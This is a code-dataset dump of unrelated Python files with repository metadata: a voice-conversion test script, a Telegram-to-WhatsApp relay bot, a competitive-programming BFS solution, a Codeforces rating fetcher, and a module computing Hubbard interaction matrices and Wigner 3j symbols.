print('Testing on source speaker {} and target speaker {}, output shape: {}'.format(s_speaker, t_speaker, wav_data.shape))
print('Comparing ASR result - WERR: {:.3f} CERR: {:.3f}'.format(err_result[0], err_result[1]))
def test_encode(trainer, seg_len, test_path, data_path, result_dir, flag='test'):
files = sorted(glob.glob(os.path.join(test_path, '*.wav')))
feeds = []
for line in files:
line = line.split('/')[-1]
feeds.append({'s_id' : line.split('_')[0],
'utt_id' : line.split('_')[1].split('.')[0]})
print('[Tester] - Number of files to encoded: ', len(feeds))
dir_path = os.path.join(result_dir, f'{flag}/')
os.makedirs(dir_path, exist_ok=True)
with h5py.File(data_path, 'r') as f_h5:
for feed in tqdm(feeds):
src_speaker_spec = f_h5[f"test/{feed['s_id']}/{feed['utt_id']}/lin"][()]
encode(src_speaker_spec, trainer, seg_len, s_speaker=feed['s_id'], utt_id=feed['utt_id'], result_dir=dir_path)
def target_classify(trainer, seg_len, synthesis_list, result_dir, flag='test'):
dir_path = os.path.join(result_dir, f'{flag}/')
with open(synthesis_list, 'r') as f:
file = f.readlines()
acc = []
for line in file:
# get wav path
line = line.split('\n')[0].split(' ')
utt_id = line[0].split('/')[1].split('_')[1]
tar_speaker = line[1]
wav_path = os.path.join(dir_path, f'{tar_speaker}_{utt_id}.wav')
# get spectrogram
_, spec = get_spectrograms(wav_path)
# padding spec
if len(spec) < seg_len:
padding = np.zeros((seg_len - spec.shape[0], spec.shape[1]))
spec = np.concatenate((spec, padding), axis=0)
# classification
logits = []
for idx in range(0, len(spec), seg_len):
if idx + (seg_len*2) > len(spec):
spec_frag = spec[idx:-1]
else:
spec_frag = spec[idx:idx+seg_len]
if len(spec_frag) >= seg_len:
x = torch.from_numpy(np.expand_dims(spec_frag[:seg_len, :], axis=0)).type(torch.FloatTensor)
logit = trainer.classify(x)
logits.append(logit)
elif idx == 0:
raise RuntimeError('Please check if input is too short!')
logits = np.concatenate(logits, axis=0)
#logits = np.sum(logits, axis = 0)
for logit in logits:
am = logit.argmax()
if am == 0:
clf_speaker = 'V001'
elif am ==1:
clf_speaker = 'V002'
else:
clf_speaker = 'None'
if clf_speaker == tar_speaker:
acc.append(1)
#print('[info]: {} is classified to {}'.format(wav_path, clf_speaker))
else:
acc.append(0)
#print('[Error]: {} is classified to {}'.format(wav_path, clf_speaker))
print('Classification Acc: {:.3f}'.format(np.sum(acc)/float(len(acc))))
def encode_for_tacotron(target, trainer, seg_len, multi2idx_path, wav_path, result_path):
wavs = sorted(glob.glob(os.path.join(wav_path, '*.wav')))
print('[Converter] - Number of wav files to encoded: ', len(wavs))
names = []
enc_outputs = []
for wav_path in tqdm(wavs):
name = wav_path.split('/')[-1].split('.')[0]
s_id = name.split('_')[0]
u_id = name.split('_')[1]
if s_id != target:
continue
y, sr = librosa.load(wav_path)
d = librosa.get_duration(y=y, sr=sr)
if d > 25:
continue # --> this filter out too long utts, 3523/3533 for V001 and V002 together in the english dataset
_, spec = get_spectrograms(wav_path)
encodings = encode(spec, trainer, seg_len, save=False)
encodings = parse_encodings(encodings)
enc_outputs.append(encodings)
names.append((s_id, u_id))
# build encodings to character mapping
idx = 0
multi2idx = {}
print('[Converter] - Building encoding to symbol mapping...')
for encodings in tqdm(enc_outputs):
for encoding in encodings:
if str(encoding) not in multi2idx:
multi2idx[str(encoding)] = symbols[idx]
idx += 1
print('[Converter] - Number of unique discret units: ', len(multi2idx))
with open(multi2idx_path, 'w') as file:
file.write(json.dumps(multi2idx))
result_path = result_path.replace('target', target)
print('[Converter] - Writing to meta file...')
with open(result_path, 'w') as file:
for i, encodings in enumerate(enc_outputs):
file.write(str(names[i][0]) + '_' + str(names[i][1] + '|'))
for encoding in encodings:
file.write(multi2idx[str(encoding)])
file.write('\n')
| andi611/ZeroSpeech-TTS-without-T | convert.py | convert.py | py | 14,769 | python | en | code | 109 | github-code | 36 | [
{
"api_name": "librosa.istft",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "hps.hps.hp.hop_length",
"line_number": 30,
"usage_type": "attribute"
},
{
"api_name": "hps.hps.hp",
"line_number": 30,
"usage_type": "name"
},
{
"api_name": "hps.hps.hp.win_le... |
3302452099 | import telebot
import requests
import re
import os
from twilio.rest import Client
import pyrebase
bot = telebot.TeleBot("Replace this with telegram bot father key", parse_mode=None)
config = {
"apiKey": "",
"authDomain": "",
"databaseURL": "",
"storageBucket": ""
}
x = 0
y = 0
z = 0
q = 0
firebase = pyrebase.initialize_app(config)
db = firebase.database()
@bot.message_handler(func=lambda m: True)
def echo_all(message):
a = message.text
b = a.split('@')
print(b)
global x
global y
global z
global q
chatt = message.chat.id
if(b[0] == "/start"):
bot.reply_to(message, "Welcome to tele2WA bot")
elif(b[0] == "/setsid"):
x = b[1]
print(x)
bot.reply_to(message, "SID added")
elif(b[0] == "/settoken"):
y = b[1]
print(y)
bot.reply_to(message, "token added")
elif(b[0] == "/setfromphone"):
z = b[1]
print(z)
bot.reply_to(message, "fromphone added")
elif(b[0] == "/settophone"):
q = b[1]
print(q)
data = {
"sid":x,
"token":y,
"fromphone":z,
"tophone":q
}
db.child("users").child(chatt).set(data)
bot.reply_to(message, "details added")
elif(b[0] == "/updatetophone"):
data4 = {
"tophone": b[1]
}
db.child("users").child(chatt).update(data4)
bot.reply_to(message, "tophone updated")
elif(b[0] == "/updatefromphone"):
data5 = {
"fromphone": b[1]
}
db.child("users").child(chatt).update(data5)
bot.reply_to(message, "fromphone updated")
elif(b[0] =="/send"):
test = db.child("users").child(chatt).get()
p = test.val()['sid']
d = test.val()['token']
t = test.val()['fromphone']
r = test.val()['tophone']
client = Client(p,d)
client.messages.create(body=b[1],from_="whatsapp:"+ str(t),to="whatsapp:"+str(r))
else:
pass
bot.polling()
| harishsg99/Telegram-to-WA-bot | app.py | app.py | py | 2,041 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "telebot.TeleBot",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "pyrebase.initialize_app",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "twilio.rest.Client",
"line_number": 75,
"usage_type": "call"
}
] |
13780351709 | import sys
from collections import deque
def div_area(q):
while q:
r, c = q.popleft()
for x, y in [[r + 1, c], [r - 1, c], [r, c + 1], [r, c - 1]]:
if 0<= x < n and 0<= y < m:
if area[x][y] == 0:
area[x][y] = -1
q.append([x, y])
def next_hour():
global cheese
new_cheese = []
new_air = deque()
air = []
for i, j in cheese:
cnt = 0
cnt2 = 0
for x, y in [[i - 1, j], [i + 1, j], [i, j - 1], [i, j + 1]]:
if area[x][y] == -1:
cnt += 1
elif area[x][y] == 0:
cnt2 += 1
if cnt >= 2:
air.append([i, j])
if cnt2 > 0:
new_air.append([i, j])
else:
new_cheese.append([i, j])
for i, j in air:
area[i][j] = -1
div_area(new_air)
cheese = new_cheese
n, m = map(int, sys.stdin.readline().strip().split())
area = [list(map(int, sys.stdin.readline().strip().split())) for _ in range(n)]
cheese = []
for i in range(n):
for j in range(m):
if area[i][j] == 1:
cheese.append([i, j])
area[0][0] = -1
div_area(deque([[0, 0]]))
cnt = 0
while cheese:
next_hour()
cnt += 1
print(cnt) | Yangseyeon/BOJ | 03. Gold/2638.py | 2638.py | py | 1,281 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "collections.deque",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "sys.stdin.readline",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "sys.stdin",
"line_number": 43,
"usage_type": "attribute"
},
{
"api_name": "sys.stdin.readlin... |
5544666629 | import urllib.request
import datetime
import json
# 返回一个月内的cf场数和上/掉分情况
def get_CF_ContestCount(name):
apiUrl = "https://codeforces.com/api/user.rating?handle=" + name
try:
page = urllib.request.urlopen(apiUrl, timeout=2000)
s = page.read().decode('utf-8')
contestsData = json.loads(s)['result']
# 改为直接用rating变化的时间当做比赛时间
# 由于rating变化时间一般延迟一天,放宽到32天
lastTime=(datetime.timedelta(days=-32) +
datetime.datetime.now()).timestamp()
sum=0
cnt=0
for contest in contestsData:
if contest['ratingUpdateTimeSeconds'] < lastTime:
continue
cnt += 1
sum += contest['newRating'] - contest['oldRating']
return [cnt, sum]
except Exception as e:
print(str(e))
return [-1, -1]
if __name__ == "__main__":
while(True):
name=input("请输入要爬的ID:")
print(get_CF_ContestCount(name))
| Linzecong/LPOJ | CrawlingServer/CodeForceContestCounter.py | CodeForceContestCounter.py | py | 1,067 | python | en | code | 216 | github-code | 36 | [
{
"api_name": "urllib.request.request.urlopen",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "urllib.request.request",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "urllib.request",
"line_number": 10,
"usage_type": "name"
},
{
"api_nam... |
37952156492 | from math import sqrt
from itertools import product
import numpy as np
from scipy.special import factorial as fact
from functools import lru_cache
# The interaction matrix in desired basis
# U^{spherical}_{m1 m2 m3 m4} = \sum_{k=0}^{2l} F_k angular_matrix_element(l, k, m1, m2, m3, m4)
# H = \frac{1}{2} \sum_{ijkl,\sigma \sigma'} U_{ijkl} a_{i \sigma}^\dagger a_{j \sigma'}^\dagger a_{l \sigma'} a_{k \sigma}.
@lru_cache(maxsize=8)
def U_matrix(l,
radial_integrals=None,
U_int=None,
J_hund=None,
basis='spherical',
T=None):
r"""
Calculate the full four-index U matrix being given either radial_integrals or U_int and J_hund.
The convetion for the U matrix is that used to construct the Hamiltonians, namely:
.. math:: H = \frac{1}{2} \sum_{ijkl,\sigma \sigma'} U_{ijkl} a_{i \sigma}^\dagger a_{j \sigma'}^\dagger a_{l \sigma'} a_{k \sigma}.
Parameters
----------
l : integer
Angular momentum of shell being treated (l=2 for d shell, l=3 for f shell).
radial_integrals : list, optional
Slater integrals [F0,F2,F4,..].
Must be provided if U_int and J_hund are not given.
Preferentially used to compute the U_matrix if provided alongside U_int and J_hund.
U_int : scalar, optional
Value of the screened Hubbard interaction.
Must be provided if radial_integrals are not given.
J_hund : scalar, optional
Value of the Hund's coupling.
Must be provided if radial_integrals are not given.
basis : string, optional
The basis in which the interaction matrix should be computed.
Takes the values
- 'spherical': spherical harmonics,
- 'cubic': cubic harmonics,
- 'other': other basis type as given by the transformation matrix T.
T : real/complex numpy array, optional
Transformation matrix for basis change.
Must be provided if basis='other'.
The transformation matrix is defined such that new creation operators :math:`b^\dagger` are related to
the old ones :math:`a^\dagger` as
.. math:: b_{i \sigma}^\dagger = \sum_j T_{ij} a^\dagger_{j \sigma}.
Returns
-------
U_matrix : float numpy array
The four-index interaction matrix in the chosen basis.
"""
# Check all necessary information is present and consistent
if radial_integrals is None and (U_int is None and J_hund is None):
raise ValueError(
"U_matrix: provide either the radial_integrals or U_int and J_hund."
)
if radial_integrals is None and (U_int is not None and J_hund is not None):
radial_integrals = U_J_to_radial_integrals(l, U_int, J_hund)
if radial_integrals is not None and (U_int is not None
and J_hund is not None):
if len(radial_integrals) - 1 != l:
raise ValueError(
"U_matrix: inconsistency in l and number of radial_integrals provided."
)
if (radial_integrals - U_J_to_radial_integrals(l, U_int,
J_hund)).any() != 0.0:
print(
"Warning: U_matrix: radial_integrals provided do not match U_int and J_hund. Using radial_integrals to calculate U_matrix."
)
# Full interaction matrix
# Basis of spherical harmonics Y_{-2}, Y_{-1}, Y_{0}, Y_{1}, Y_{2}
# U^{spherical}_{m1 m2 m3 m4} = \sum_{k=0}^{2l} F_k angular_matrix_element(l, k, m1, m2, m3, m4)
U_mat = np.zeros(
(2 * l + 1, 2 * l + 1, 2 * l + 1, 2 * l + 1), dtype=float)
m_range = list(range(-l, l + 1))
for n, F in enumerate(radial_integrals):
k = 2 * n
for m1, m2, m3, m4 in product(m_range, m_range, m_range, m_range):
U_mat[m1 + l, m2 + l, m3 + l, m4 +
l] += F * angular_matrix_element(l, k, m1, m2, m3, m4)
# Transform from spherical basis if needed
if basis == "cubic": T = spherical_to_cubic(l, convention='wien2k')
if basis == "other" and T is None:
raise ValueError("U_matrix: provide T for other bases.")
if T is not None: U_mat = transform_U_matrix(U_mat, T)
return U_mat
# Convert full 4-index U matrix to 2-index density-density form
def reduce_4index_to_2index(U_4index):
r"""
Reduces the four-index matrix to two-index matrices for parallel and anti-parallel spins.
Parameters
----------
U_4index : float numpy array
The four-index interaction matrix.
Returns
-------
U : float numpy array
The two-index interaction matrix for parallel spins.
Uprime : float numpy array
The two-index interaction matrix for anti-parallel spins.
"""
size = U_4index.shape[0] # 2l+1
U = np.zeros((size, size), dtype=float) # matrix for same spin
Uprime = np.zeros((size, size), dtype=float) # matrix for opposite spin
m_range = list(range(size))
for m, mp in product(m_range, m_range):
U[m, mp] = U_4index[m, mp, m, mp].real - U_4index[m, mp, mp, m].real
Uprime[m, mp] = U_4index[m, mp, m, mp].real
return U, Uprime
# Construct the 2-index matrices for the density-density form
@lru_cache(maxsize=8)
def U_matrix_kanamori(n_orb, U_int, J_hund):
r"""
Calculate the Kanamori U and Uprime matrices.
Parameters
----------
n_orb : integer
Number of orbitals in basis.
U_int : scalar
Value of the screened Hubbard interaction.
J_hund : scalar
Value of the Hund's coupling.
Returns
-------
U : float numpy array
The two-index interaction matrix for parallel spins.
Uprime : float numpy array
The two-index interaction matrix for anti-parallel spins.
"""
U = np.zeros((n_orb, n_orb), dtype=float) # matrix for same spin
Uprime = np.zeros((n_orb, n_orb), dtype=float) # matrix for opposite spin
m_range = list(range(n_orb))
for m, mp in product(m_range, m_range):
if m == mp:
Uprime[m, mp] = U_int
else:
U[m, mp] = U_int - 3.0 * J_hund
Uprime[m, mp] = U_int - 2.0 * J_hund
return U, Uprime
@lru_cache(maxsize=8)
def U_matrix_dudarev(n_orb, U_int, J_hund):
r"""
Calculate the Dudarev U and Uprime matrices.
Parameters
----------
n_orb : integer
Number of orbitals in basis.
U_int : scalar
Value of the screened Hubbard interaction.
J_hund : scalar
Value of the Hund's coupling.
Returns
-------
U : float numpy array
The two-index interaction matrix for parallel spins.
Uprime : float numpy array
The two-index interaction matrix for anti-parallel spins.
"""
U = np.zeros((n_orb, n_orb), dtype=float) # matrix for same spin
Uprime = np.zeros((n_orb, n_orb), dtype=float) # matrix for opposite spin
m_range = list(range(n_orb))
for m, mp in product(m_range, m_range):
if m == mp:
Uprime[m, mp] = U_int
else:
U[m, mp] = U_int - 1.0 * J_hund
Uprime[m, mp] = U_int
return U, Uprime
# Get t2g or eg components
def t2g_submatrix(U, convention=''):
r"""
Extract the t2g submatrix of the full d-manifold two- or four-index U matrix.
Parameters
----------
U : float numpy array
Two- or four-index interaction matrix.
convention : string, optional
The basis convention.
Takes the values
- '': basis ordered as ("xy","yz","z^2","xz","x^2-y^2"),
- 'wien2k': basis ordered as ("z^2","x^2-y^2","xy","yz","xz").
Returns
-------
U_t2g : float numpy array
The t2g component of the interaction matrix.
"""
if convention == 'wien2k':
return subarray(U, len(U.shape) * [(2, 3, 4)])
elif convention == '':
return subarray(U, len(U.shape) * [(0, 1, 3)])
else:
raise ValueError("Unknown convention: " + str(convention))
def eg_submatrix(U, convention=''):
r"""
Extract the eg submatrix of the full d-manifold two- or four-index U matrix.
Parameters
----------
U : float numpy array
Two- or four-index interaction matrix.
convention : string, optional
The basis convention.
Takes the values
- '': basis ordered as ("xy","yz","z^2","xz","x^2-y^2"),
- 'wien2k': basis ordered as ("z^2","x^2-y^2","xy","yz","xz").
Returns
-------
U_eg : float numpy array
The eg component of the interaction matrix.
"""
if convention == 'wien2k':
return subarray(U, len(U.shape) * [(0, 1)])
elif convention == '':
return subarray(U, len(U.shape) * [(2, 4)])
else:
raise ValueError("Unknown convention: " + str(convention))
# Transform the interaction matrix into another basis
def transform_U_matrix(U_mat, T):
r"""
Transform a four-index interaction matrix into another basis.
The transformation matrix is defined such that new creation operators :math:`b^\dagger` are related to
the old ones :math:`a^\dagger` as
.. math:: b_{i \sigma}^\dagger = \sum_j T_{ij} a^\dagger_{j \sigma}.
Parameters
----------
U_mat : float numpy array
The four-index interaction matrix in the original basis.
T : real/complex numpy array, optional
Transformation matrix for basis change.
Must be provided if basis='other'.
Returns
-------
U_mat : float numpy array
The four-index interaction matrix in the new basis.
"""
return np.einsum("ij,kl,jlmo,mn,op", np.conj(T), np.conj(T), U_mat,
np.transpose(T), np.transpose(T))
# Rotation matrices: complex harmonics to cubic harmonics
# Complex harmonics basis: ..., Y_{-2}, Y_{-1}, Y_{0}, Y_{1}, Y_{2}, ...
def spherical_to_cubic(l, convention=''):
r"""
Get the spherical harmonics to cubic harmonics transformation matrix.
Parameters
----------
l : integer
Angular momentum of shell being treated (l=2 for d shell, l=3 for f shell).
convention : string, optional
The basis convention.
Takes the values
- '': basis ordered as ("xy","yz","z^2","xz","x^2-y^2"),
- 'wien2k': basis ordered as ("z^2","x^2-y^2","xy","yz","xz").
Returns
-------
T : real/complex numpy array
Transformation matrix for basis change.
"""
if not convention in ('wien2k', ''):
raise ValueError("Unknown convention: " + str(convention))
size = 2 * l + 1
T = np.zeros((size, size), dtype=complex)
if convention == 'wien2k' and l != 2:
raise ValueError(
"spherical_to_cubic: wien2k convention implemented only for l=2")
if l == 0:
cubic_names = ("s")
elif l == 1:
cubic_names = ("x", "y", "z")
T[0, 0] = 1.0 / sqrt(2)
T[0, 2] = -1.0 / sqrt(2)
T[1, 0] = 1j / sqrt(2)
T[1, 2] = 1j / sqrt(2)
T[2, 1] = 1.0
elif l == 2:
if convention == 'wien2k':
cubic_names = ("z^2", "x^2-y^2", "xy", "yz", "xz")
T[0, 2] = 1.0
T[1, 0] = 1.0 / sqrt(2)
T[1, 4] = 1.0 / sqrt(2)
T[2, 0] = -1.0 / sqrt(2)
T[2, 4] = 1.0 / sqrt(2)
T[3, 1] = 1.0 / sqrt(2)
T[3, 3] = -1.0 / sqrt(2)
T[4, 1] = 1.0 / sqrt(2)
T[4, 3] = 1.0 / sqrt(2)
else:
cubic_names = ("xy", "yz", "z^2", "xz", "x^2-y^2")
T[0, 0] = 1j / sqrt(2)
T[0, 4] = -1j / sqrt(2)
T[1, 1] = 1j / sqrt(2)
T[1, 3] = 1j / sqrt(2)
T[2, 2] = 1.0
T[3, 1] = 1.0 / sqrt(2)
T[3, 3] = -1.0 / sqrt(2)
T[4, 0] = 1.0 / sqrt(2)
T[4, 4] = 1.0 / sqrt(2)
elif l == 3:
cubic_names = ("x(x^2-3y^2)", "z(x^2-y^2)", "xz^2", "z^3", "yz^2",
"xyz", "y(3x^2-y^2)")
T[0, 0] = 1.0 / sqrt(2)
T[0, 6] = -1.0 / sqrt(2)
T[1, 1] = 1.0 / sqrt(2)
T[1, 5] = 1.0 / sqrt(2)
T[2, 2] = 1.0 / sqrt(2)
T[2, 4] = -1.0 / sqrt(2)
T[3, 3] = 1.0
T[4, 2] = 1j / sqrt(2)
T[4, 4] = 1j / sqrt(2)
T[5, 1] = 1j / sqrt(2)
T[5, 5] = -1j / sqrt(2)
T[6, 0] = 1j / sqrt(2)
T[6, 6] = 1j / sqrt(2)
else:
raise ValueError("spherical_to_cubic: implemented only for l=0,1,2,3")
return np.matrix(T)
# Names of cubic harmonics
def cubic_names(l):
r"""
Get the names of the cubic harmonics.
Parameters
----------
l : integer or string
Angular momentum of shell being treated.
Also takes 't2g' and 'eg' as arguments.
Returns
-------
cubic_names : tuple of strings
Names of the orbitals.
"""
if l == 0 or l == 's':
return ("s")
elif l == 1 or l == 'p':
return ("x", "y", "z")
elif l == 2 or l == 'd':
return ("xy", "yz", "z^2", "xz", "x^2-y^2")
elif l == 't2g':
return ("xy", "yz", "xz")
elif l == 'eg':
return ("z^2", "x^2-y^2")
elif l == 3 or l == 'f':
return ("x(x^2-3y^2)", "z(x^2-y^2)", "xz^2", "z^3", "yz^2", "xyz",
"y(3x^2-y^2)")
else:
raise ValueError("cubic_names: implemented only for l=0,1,2,3")
# Convert U,J -> radial integrals F_k
def U_J_to_radial_integrals(l, U_int, J_hund):
r"""
Determine the radial integrals F_k from U_int and J_hund.
Parameters
----------
l : integer
Angular momentum of shell being treated (l=2 for d shell, l=3 for f shell).
U_int : scalar
Value of the screened Hubbard interaction.
J_hund : scalar
Value of the Hund's coupling.
Returns
-------
radial_integrals : list
Slater integrals [F0,F2,F4,..].
"""
F = np.zeros((l + 1), dtype=float)
if l == 1:
F[0] = U_int
F[1] = 5.0 * J_hund
elif l == 2:
F[0] = U_int
F[1] = J_hund * 14.0 / (1.0 + 0.63)
F[2] = 0.630 * F[1]
elif l == 3:
F[0] = U_int
F[1] = 6435.0 * J_hund / (
286.0 + 195.0 * 451.0 / 675.0 + 250.0 * 1001.0 / 2025.0)
F[2] = 451.0 * F[1] / 675.0
F[3] = 1001.0 * F[1] / 2025.0
else:
raise ValueError(
"U_J_to_radial_integrals: implemented only for l=1,2,3")
return F
# Convert radial integrals F_k -> U,J
def radial_integrals_to_U_J(l, F):
r"""
Determine U_int and J_hund from the radial integrals.
Parameters
----------
l : integer
Angular momentum of shell being treated (l=2 for d shell, l=3 for f shell).
F : list
Slater integrals [F0,F2,F4,..].
Returns
-------
U_int : scalar
Value of the screened Hubbard interaction.
J_hund : scalar
Value of the Hund's coupling.
"""
if l == 1:
U_int = F[0]
J_hund = F[1] / 5.0
elif l == 2:
U_int = F[0]
J_hund = F[1] * (1.0 + 0.63) / 14.0
elif l == 3:
U_int = F[0]
J_hund = F[1] * (
286.0 + 195.0 * 451.0 / 675.0 + 250.0 * 1001.0 / 2025.0) / 6435.0
else:
raise ValueError(
"radial_integrals_to_U_J: implemented only for l=1,2,3")
return U_int, J_hund
# Angular matrix elements of particle-particle interaction
# (2l+1)^2 ((l 0) (k 0) (l 0))^2 \sum_{q=-k}^{k} (-1)^{m1+m2+q} ((l -m1) (k q) (l m3)) ((l -m2) (k -q) (l m4))
def angular_matrix_element(l, k, m1, m2, m3, m4):
r"""
Calculate the angular matrix element
.. math::
(2l+1)^2
\begin{pmatrix}
l & k & l \\
0 & 0 & 0
\end{pmatrix}^2
\sum_{q=-k}^k (-1)^{m_1+m_2+q}
\begin{pmatrix}
l & k & l \\
-m_1 & q & m_3
\end{pmatrix}
\begin{pmatrix}
l & k & l \\
-m_2 & -q & m_4
\end{pmatrix}.
Parameters
----------
l : integer
k : integer
m1 : integer
m2 : integer
m3 : integer
m4 : integer
Returns
-------
ang_mat_ele : scalar
Angular matrix element.
"""
ang_mat_ele = 0
for q in range(-k, k + 1):
ang_mat_ele += three_j_symbol(
(l, -m1), (k, q), (l, m3)) * three_j_symbol(
(l, -m2), (k, -q), (l, m4)) * (-1.0
if (m1 + q + m2) % 2 else 1.0)
ang_mat_ele *= (2 * l + 1)**2 * (three_j_symbol((l, 0), (k, 0), (l, 0))**2)
return ang_mat_ele
# Wigner 3-j symbols
# ((j1 m1) (j2 m2) (j3 m3))
def three_j_symbol(jm1, jm2, jm3):
r"""
Calculate the three-j symbol
.. math::
\begin{pmatrix}
l_1 & l_2 & l_3\\
m_1 & m_2 & m_3
\end{pmatrix}.
Parameters
----------
jm1 : tuple of integers
(j_1 m_1)
jm2 : tuple of integers
(j_2 m_2)
jm3 : tuple of integers
(j_3 m_3)
Returns
-------
three_j_sym : scalar
Three-j symbol.
"""
j1, m1 = jm1
j2, m2 = jm2
j3, m3 = jm3
if (m1 + m2 + m3 != 0 or m1 < -j1 or m1 > j1 or m2 < -j2 or m2 > j2
or m3 < -j3 or m3 > j3 or j3 > j1 + j2 or j3 < abs(j1 - j2)):
return .0
three_j_sym = -1.0 if (j1 - j2 - m3) % 2 else 1.0
three_j_sym *= sqrt(
fact(j1 + j2 - j3) * fact(j1 - j2 + j3) * fact(-j1 + j2 + j3) /
fact(j1 + j2 + j3 + 1))
three_j_sym *= sqrt(
fact(j1 - m1) * fact(j1 + m1) * fact(j2 - m2) * fact(j2 + m2) *
fact(j3 - m3) * fact(j3 + m3))
t_min = max(j2 - j3 - m1, j1 - j3 + m2, 0)
t_max = min(j1 - m1, j2 + m2, j1 + j2 - j3)
t_sum = 0
for t in range(t_min, t_max + 1):
t_sum += (-1.0 if t % 2 else 1.0) / (
fact(t) * fact(j3 - j2 + m1 + t) * fact(j3 - j1 - m2 + t) *
fact(j1 + j2 - j3 - t) * fact(j1 - m1 - t) * fact(j2 + m2 - t))
three_j_sym *= t_sum
return three_j_sym
# Clebsch-Gordan coefficients
# < j1 m1 j2 m2 | j3 m3 > = (-1)^{j1-j2+m3} \sqrt{2j3+1} ((j1 m1) (j2 m2) (j3 -m3))
def clebsch_gordan(jm1, jm2, jm3):
r"""
Calculate the Clebsh-Gordan coefficient
.. math::
\langle j_1 m_1 j_2 m_2 | j_3 m_3 \rangle = (-1)^{j_1-j_2+m_3} \sqrt{2 j_3 + 1}
\begin{pmatrix}
j_1 & j_2 & j_3\\
m_1 & m_2 & -m_3
\end{pmatrix}.
Parameters
----------
jm1 : tuple of integers
(j_1 m_1)
jm2 : tuple of integers
(j_2 m_2)
jm3 : tuple of integers
(j_3 m_3)
Returns
-------
cgcoeff : scalar
Clebsh-Gordan coefficient.
"""
norm = sqrt(2 * jm3[0] + 1) * (-1 if jm1[0] - jm2[0] + jm3[1] % 2 else 1)
return norm * three_j_symbol(jm1, jm2, (jm3[0], -jm3[1]))
# Create subarray containing columns in idxlist
# e.g. idxlist = [(0),(2,3),(0,1,2,3)] gives
# column 0 for 1st dim,
# columns 2 and 3 for 2nd dim,
# columns 0,1,2 and 3 for 3rd dim.
def subarray(a, idxlist, n=None):
r"""
Extract a subarray from a matrix-like object.
Parameters
----------
a : matrix or array
idxlist : list of tuples
Columns that need to be extracted for each dimension.
Returns
-------
subarray : matrix or array
Examples
--------
idxlist = [(0),(2,3),(0,1,2,3)] gives
- column 0 for 1st dim,
- columns 2 and 3 for 2nd dim,
- columns 0, 1, 2 and 3 for 3rd dim.
"""
if n is None: n = len(a.shape) - 1
sa = a[tuple(slice(x) for x in a.shape[:n]) + (idxlist[n], )]
return subarray(sa, idxlist, n - 1) if n > 0 else sa
| romerogroup/CondensedMatter_Jupyter | code/minimulti/electron/U_matrix.py | U_matrix.py | py | 19,979 | python | en | code | 7 | github-code | 36 | [
{
"api_name": "numpy.zeros",
"line_number": 84,
"usage_type": "call"
},
{
"api_name": "itertools.product",
"line_number": 90,
"usage_type": "call"
},
{
"api_name": "functools.lru_cache",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.